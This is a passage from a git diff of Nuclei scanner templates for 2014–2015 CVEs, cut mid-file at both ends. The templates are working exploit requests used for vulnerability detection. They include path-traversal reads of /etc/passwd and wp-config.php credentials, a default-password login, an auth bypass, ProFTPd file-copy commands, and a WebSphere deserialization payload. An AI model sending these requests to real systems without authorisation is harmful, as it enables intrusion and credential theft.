+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2014/cve-2014-5258.yaml b/nuclei-templates/CVE-2014/cve-2014-5258.yaml
deleted file mode 100644
index 70144e35a4..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-5258.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2014-5258
-
-info:
- name: webEdition 6.3.8.0 - Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
- reference:
- - https://www.exploit-db.com/exploits/34761
- - https://www.cvedetails.com/cve/CVE-2014-5258
- tags: cve,cve2014,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2014/cve-2014-5368.yaml b/nuclei-templates/CVE-2014/cve-2014-5368.yaml
new file mode 100644
index 0000000000..bf03c5374a
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-5368.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-5368
+
+info:
+ name: WordPress Plugin WP Content Source Control - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/39287
+ - https://www.cvedetails.com/cve/CVE-2014-5368
+ tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2014/cve-2014-8799.yaml b/nuclei-templates/CVE-2014/cve-2014-8799.yaml
new file mode 100644
index 0000000000..2fff64b065
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-8799.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-8799
+
+info:
+ name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
+ reference:
+ - https://www.exploit-db.com/exploits/35346
+ - https://www.cvedetails.com/cve/CVE-2014-8799
+ tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ - "DB_USER"
+ - "DB_HOST"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2014/CVE-2014-9094.yaml b/nuclei-templates/CVE-2014/cve-2014-9094.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/CVE-2014-9094.yaml
rename to nuclei-templates/CVE-2014/cve-2014-9094.yaml
diff --git a/nuclei-templates/CVE-2014/cve-2014-9614.yaml b/nuclei-templates/CVE-2014/cve-2014-9614.yaml
deleted file mode 100644
index 19acbf289c..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-9614.yaml
+++ /dev/null
@@ -1,44 +0,0 @@
-id: CVE-2014-9614
-
-info:
- name: Netsweeper 4.0.5 - Default Weak Account
- author: daffainfo
- severity: critical
- description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
- reference:
- - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- - https://nvd.nist.gov/vuln/detail/CVE-2014-9614
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2014-9614
- cwe-id: CWE-798
- tags: cve,cve2021,netsweeper,default-login
-
-requests:
- - raw:
- - |
- POST /webadmin/auth/verification.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- Referer: {{BaseURL}}/webadmin/start/
-
- login=branding&password=branding&Submit=Login
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
-
- - type: word
- part: header
- words:
- - 'Location: ../common/'
- - 'Location: ../start/'
- condition: or
-
- - type: word
- part: header
- words:
- - 'Set-Cookie: webadminU='
diff --git a/nuclei-templates/CVE-2014/cve-2014-9618.yaml b/nuclei-templates/CVE-2014/cve-2014-9618.yaml
deleted file mode 100644
index 0fc0c1d536..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-9618.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: CVE-2014-9618
-
-info:
- name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
- author: daffainfo
- severity: critical
- description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
- reference:
- - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- - https://nvd.nist.gov/vuln/detail/CVE-2014-9618
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2014-9618
- cwe-id: CWE-287
- tags: cve,cve2014,netsweeper,auth-bypass
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
- - 'placeholder="Profile Manager">'
- - 'Netsweeper WebAdmin'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml
deleted file mode 100644
index 5b40f010c9..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2015-1000012
-
-info:
- name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
- author: daffainfo
- severity: high
- description: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin
- reference:
- - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
- - http://www.vapidlabs.com/advisory.php?v=154
- - http://www.securityfocus.com/bid/94495
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2015-1000012
- cwe-id: CWE-200
- tags: cve,cve2015,wordpress,wp-plugin,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- part: body
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-1503.yaml b/nuclei-templates/CVE-2015/CVE-2015-1503.yaml
new file mode 100644
index 0000000000..7cb0459ae6
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-1503.yaml
@@ -0,0 +1,32 @@
+id: CVE-2015-1503
+info:
+ name: IceWarp Mail Server Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
+ reference:
+ - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-1503
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-1503
+ cwe-id: CWE-200
+ tags: cve,cve2015,icewarp,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
+ - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-1880.yaml b/nuclei-templates/CVE-2015/CVE-2015-1880.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/cve-2015-1880.yaml
rename to nuclei-templates/CVE-2015/CVE-2015-1880.yaml
diff --git a/nuclei-templates/CVE-2015/cve-2015-2068.yaml b/nuclei-templates/CVE-2015/CVE-2015-2068.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/cve-2015-2068.yaml
rename to nuclei-templates/CVE-2015/CVE-2015-2068.yaml
diff --git a/nuclei-templates/CVE-2015/CVE-2015-2080.yaml b/nuclei-templates/CVE-2015/CVE-2015-2080.yaml
new file mode 100644
index 0000000000..adcfc5fbbd
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-2080.yaml
@@ -0,0 +1,39 @@
+id: CVE-2015-2080
+
+info:
+ name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
+ author: pikpikcu
+ severity: high
+ description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
+ reference:
+ - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
+ - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
+ - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-2080
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-2080
+ cwe-id: CWE-200
+ tags: cve,cve2015,jetty,packetstorm
+ metadata:
+ max-request: 1
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}"
+ headers:
+ Referer: \x00
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 400
+ - type: word
+ words:
+ - "Illegal character 0x0 in state"
+ part: body
+
+# Enhanced by mp on 2022/04/21
diff --git a/nuclei-templates/CVE-2015/CVE-2015-2166.yaml b/nuclei-templates/CVE-2015/CVE-2015-2166.yaml
new file mode 100644
index 0000000000..dedb5e6276
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-2166.yaml
@@ -0,0 +1,31 @@
+id: CVE-2015-2166
+
+info:
+ name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
+ reference:
+ - https://www.exploit-db.com/exploits/36619
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-2166
+ - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html
+ - http://www.securityfocus.com/bid/73901
+ classification:
+ cve-id: CVE-2015-2166
+ tags: cve,cve2015,lfi,ericsson
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-3306.yaml b/nuclei-templates/CVE-2015/CVE-2015-3306.yaml
new file mode 100644
index 0000000000..18a0e85813
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-3306.yaml
@@ -0,0 +1,36 @@
+id: CVE-2015-3306
+
+info:
+ name: ProFTPd RCE
+ author: pdteam
+ severity: high
+ description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
+ reference:
+ - https://github.com/t0kx/exploit-CVE-2015-3306
+ - https://www.exploit-db.com/exploits/36803/
+ - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
+ - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
+ classification:
+ cve-id: CVE-2015-3306
+ tags: cve,cve2015,ftp,rce,network,proftpd
+
+network:
+ - inputs:
+ - data: "site cpfr /proc/self/cmdline\r\n"
+ read: 1024
+ - data: "site cpto /tmp/.{{randstr}}\r\n"
+ read: 1024
+ - data: "site cpfr /tmp/.{{randstr}}\r\n"
+ read: 1024
+ - data: "site cpto /var/www/html/{{randstr}}\r\n"
+
+ host:
+ - "{{Hostname}}"
+ - "{{Host}}:21"
+
+ read-size: 1024
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "Copy successful"
diff --git a/nuclei-templates/CVE-2015/CVE-2015-3337.yaml b/nuclei-templates/CVE-2015/CVE-2015-3337.yaml
new file mode 100644
index 0000000000..51f7c9d212
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-3337.yaml
@@ -0,0 +1,39 @@
+id: CVE-2015-3337
+
+info:
+ name: Elasticsearch - Local File Inclusion
+ author: pdteam
+ severity: high
+ description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
+ reference:
+ - https://www.exploit-db.com/exploits/37054/
+ - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385
+ - https://www.elastic.co/community/security
+ - http://www.debian.org/security/2015/dsa-3241
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-3337
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2015-3337
+ cwe-id: CWE-22
+ tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin
+ metadata:
+ max-request: 1
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/nuclei-templates/CVE-2015/CVE-2015-4414.yaml b/nuclei-templates/CVE-2015/CVE-2015-4414.yaml
deleted file mode 100644
index 59c92e4279..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-4414.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2015-4414
-
-info:
- name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
- reference:
- - https://www.exploit-db.com/exploits/37274
- - https://www.cvedetails.com/cve/CVE-2015-4414
- - https://www.exploit-db.com/exploits/37274/
- - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
- classification:
- cve-id: CVE-2015-4414
- tags: cve,cve2015,wordpress,wp-plugin,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-4632.yaml b/nuclei-templates/CVE-2015/CVE-2015-4632.yaml
new file mode 100644
index 0000000000..b32d845e51
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-4632.yaml
@@ -0,0 +1,34 @@
+id: CVE-2015-4632
+
+info:
+ name: Koha 3.20.1 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
+ reference:
+ - https://www.exploit-db.com/exploits/37388
+ - https://www.cvedetails.com/cve/CVE-2015-4632
+ - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
+ - https://www.exploit-db.com/exploits/37388/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-4632
+ cwe-id: CWE-22
+ tags: cve,cve2015,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml b/nuclei-templates/CVE-2015/CVE-2015-4694.yaml
deleted file mode 100644
index e17313f7e9..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: CVE-2015-4694
-
-info:
- name: Zip Attachments <= 1.1.4 - Arbitrary File Download
- author: 0x_Akoko
- severity: high
- tags: lfi,wordpress,wp,cve
- reference: https://wpscan.com/vulnerability/8047
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-5354.yaml b/nuclei-templates/CVE-2015/CVE-2015-5354.yaml
deleted file mode 100644
index 20062f876d..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-5354.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2015-5354
-info:
- name: Novius OS 5.0.1-elche - Open Redirect
- author: 0x_Akoko
- severity: medium
- description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
- reference:
- - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
- - https://vuldb.com/?id.76181
- - https://nvd.nist.gov/vuln/detail/CVE-2015-5354
- - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2015-5354
- cwe-id: CWE-601
- tags: cve,cve2015,redirect,novius
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
- matchers:
- - type: regex
- part: header
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/nuclei-templates/CVE-2015/cve-2015-5461.yaml b/nuclei-templates/CVE-2015/CVE-2015-5461.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/cve-2015-5461.yaml
rename to nuclei-templates/CVE-2015/CVE-2015-5461.yaml
diff --git a/nuclei-templates/CVE-2015/CVE-2015-5471.yaml b/nuclei-templates/CVE-2015/CVE-2015-5471.yaml
new file mode 100644
index 0000000000..4c6adff168
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-5471.yaml
@@ -0,0 +1,23 @@
+id: CVE-2015-5471
+info:
+ name: Swim Team <= v1.44.10777 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
+ tags: wordpress,plugin,wp,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-5531.yaml b/nuclei-templates/CVE-2015/CVE-2015-5531.yaml
deleted file mode 100644
index 5676ccf215..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-5531.yaml
+++ /dev/null
@@ -1,64 +0,0 @@
-id: CVE-2015-5531
-
-info:
- name: ElasticSearch <1.6.1 - Local File Inclusion
- author: princechaddha
- severity: high
- description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
- reference:
- - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
- - https://nvd.nist.gov/vuln/detail/CVE-2015-5531
- - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
- - https://www.elastic.co/community/security/
- classification:
- cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
- cvss-score: 5
- cve-id: CVE-2015-5531
- cwe-id: CWE-22
- tags: vulhub,packetstorm,cve,cve2015,elasticsearch
- metadata:
- max-request: 3
-
-http:
- - raw:
- - |
- PUT /_snapshot/test HTTP/1.1
- Host: {{Hostname}}
-
- {
- "type": "fs",
- "settings": {
- "location": "/usr/share/elasticsearch/repo/test"
- }
- }
-
- - |
- PUT /_snapshot/test2 HTTP/1.1
- Host: {{Hostname}}
-
- {
- "type": "fs",
- "settings": {
- "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
- }
- }
-
- - |
- GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
- Host: {{Hostname}}
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'ElasticsearchParseException'
- - 'Failed to derive xcontent from'
- - '114, 111, 111, 116, 58'
- condition: and
-
- - type: status
- status:
- - 400
-
-# Enhanced by mp on 2022/06/08
diff --git a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml b/nuclei-templates/CVE-2015/CVE-2015-7450.yaml
deleted file mode 100644
index 6476c78b02..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml
+++ /dev/null
@@ -1,62 +0,0 @@
-id: CVE-2015-7450
-
-info:
- name: IBM WebSphere Java Object Deserialization - Remote Code Execution
- author: wdahlenb
- severity: critical
- description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).
- reference:
- - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
- - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- - https://nvd.nist.gov/vuln/detail/CVE-2015-7450
- - http://www-01.ibm.com/support/docview.wss?uid=swg21972799
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2015-7450
- cwe-id: CWE-94
- metadata:
- max-request: 1
- shodan-query: http.html:"IBM WebSphere Portal"
- tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev
-
-http:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: text/xml; charset=utf-8
- SOAPAction: "urn:AdminService"
-
-
-
-
-
-
-
- rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==
- getUnsavedChanges
- {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}
- rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=
-
-
-
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 500
-
- - type: word
- words:
- - 'SOAP-ENV:Server'
- - ''
- condition: and
-
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"
-
-# Enhanced by mp on 2022/05/10
diff --git a/nuclei-templates/CVE-2015/CVE-2015-8813.yaml b/nuclei-templates/CVE-2015/CVE-2015-8813.yaml
new file mode 100644
index 0000000000..6b29a0b822
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-8813.yaml
@@ -0,0 +1,29 @@
+id: CVE-2015-8813
+
+info:
+ name: Umbraco SSRF Vulnerability in Feedproxy.aspx
+ author: emadshanab
+ severity: high
+ description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server
+ reference:
+ - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
+ - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
+ - http://www.openwall.com/lists/oss-security/2016/02/18/8
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
+ cvss-score: 8.2
+ cve-id: CVE-2015-8813
+ cwe-id: CWE-918
+ tags: cve,cve2015,ssrf,oast,umbraco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/nuclei-templates/CVE-2015/cve-2015-1000012.yaml b/nuclei-templates/CVE-2015/cve-2015-1000012.yaml
new file mode 100644
index 0000000000..52ad59227d
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-1000012.yaml
@@ -0,0 +1,31 @@
+id: CVE-2015-1000012
+
+info:
+ name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ reference:
+ - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2015-1000012
+ cwe-id: CWE-200
+ description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
+ tags: cve,cve2015,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-1503.yaml b/nuclei-templates/CVE-2015/cve-2015-1503.yaml
deleted file mode 100644
index 273a65668b..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-1503.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2015-1503
-info:
- name: IceWarp Mail Server Directory Traversal
- author: 0x_Akoko
- severity: high
- description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
- reference:
- - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
- - http://www.icewarp.com
